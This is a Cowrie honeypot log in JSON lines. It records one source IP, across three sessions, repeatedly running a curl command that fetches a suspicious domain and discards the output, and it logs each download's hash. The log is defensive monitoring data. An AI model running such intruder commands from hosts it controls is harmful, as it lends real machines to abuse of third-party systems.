{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.185412Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.186111Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.199116Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.199813Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.237463Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.238165Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.243320Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.245491Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.262836Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.264001Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.265287Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.275742Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.277014Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.303310Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.303980Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.308501Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.313875Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.314891Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.315479Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.317339Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.318458Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.343397Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.343928Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.348694Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.350546Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.353589Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.354174Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.355441Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.356128Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.381554Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.382328Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.387093Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.389108Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.392784Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.396340Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.401209Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.402882Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.403851Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.430236Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.430951Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.433680Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.434364Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.437387Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.439686Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.461327Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.463591Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.464406Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.467995Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.470356Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.473037Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.474981Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.475693Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.477422Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.478219Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.503655Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.504336Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.508752Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.510453Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.514491Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.516856Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.534718Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.535387Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.540165Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.542011Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.542928Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.543575Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.565296Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.566282Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.566762Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.571690Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.573077Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.573615Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.576590Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.595883Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.596662Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.601248Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.603007Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.604263Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.604693Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.642836Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.643649Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.645622Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.646277Z","src_ip":"212.227.125.160","session":"9f264c568782"}
